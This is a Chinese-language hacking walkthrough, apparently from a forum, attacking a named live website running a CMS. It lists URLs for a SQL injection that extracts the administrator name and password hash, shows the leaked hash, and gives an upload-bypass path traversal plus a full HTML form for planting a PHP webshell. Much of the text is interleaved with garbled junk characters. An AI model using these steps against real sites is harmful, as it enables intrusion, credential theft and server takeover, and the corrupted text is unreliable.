①注入漏洞。
2 H6 x, o5 \' ?( I( a0 e1 T" Q. w这站 http://www.political-security.com/2 G1 f+ C& x0 S' E4 [' }# f! _
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
5 Q8 g8 e% B* i2 P* Swww.political-security.com/data/mysql_error_trace.inc 爆后台0 a' g- l& U( ^& t5 ~* W$ K
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。; E0 [5 z5 E, z+ U8 R- A7 B2 ^
然后写上语句 & I8 o& @- m4 A. V! |
查看管理员帐号' ~5 n9 o6 A6 J- z
http://www.political-security.co ... &membergroup=@`+ m/ E4 a$ |! g o t: n
* [: y1 R6 p* p2 f/ e9 m
admin - H, ~( r+ o6 I' M& Z
h2 G' U5 Z! B. _# G( @. {查看管理员密码
- j u2 s: O6 x2 U) }& F http://www.political-security.co ... &membergroup=@`% D* R, e4 i, d9 [
& Q$ u) o3 |( a' n$ w; j8d29b1ef9f8c5a5af429
; n1 F ~+ F( ]9 I$ y0 {6 t' V* I- C8 p0 O' E) }
查看管理员密码% h- C+ F6 z1 v }% y
" G& x) N9 [1 X; h. I! ^* u得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5) I' V3 M' ]* F9 T) b
0 A: Z [9 a' J8d28 {- r/ `( A5 [
9b1ef9f8c5a5af42
8 W( O$ ~$ F* x/ f }2 B9
: b; N, [7 C* {( x
' Q! r6 e& T" S4 M4 Q" l6 Zcmd5没解出来 只好测试第二个方法: r8 P5 B5 U) t" V6 }
% _$ ]& `: X4 T2 d8 c/ t$ j
. h1 T/ ~( p$ _9 r8 a②上传漏洞:% A9 E+ x$ Y5 l# T% o
# W; Y) ~- B' F4 x" |只要登陆会员中心,然后访问页面链接
! J- a2 e$ S( [7 B# f“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
3 E! O5 G8 ^* J. x: A2 F0 o$ U- M6 s9 ? o( Y
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”; Q4 H1 Y4 w+ F( k
2 c: [' z' k# K0 X; T. q6 z5 r& F) t+ F
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
+ E) @" a7 G4 s2 X) {; d4 @* r4 Q8 ?
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
9 C( C& l- |+ w9 U, f或者3 j! m( ?6 U6 @2 j* c1 [
即可上传成功 |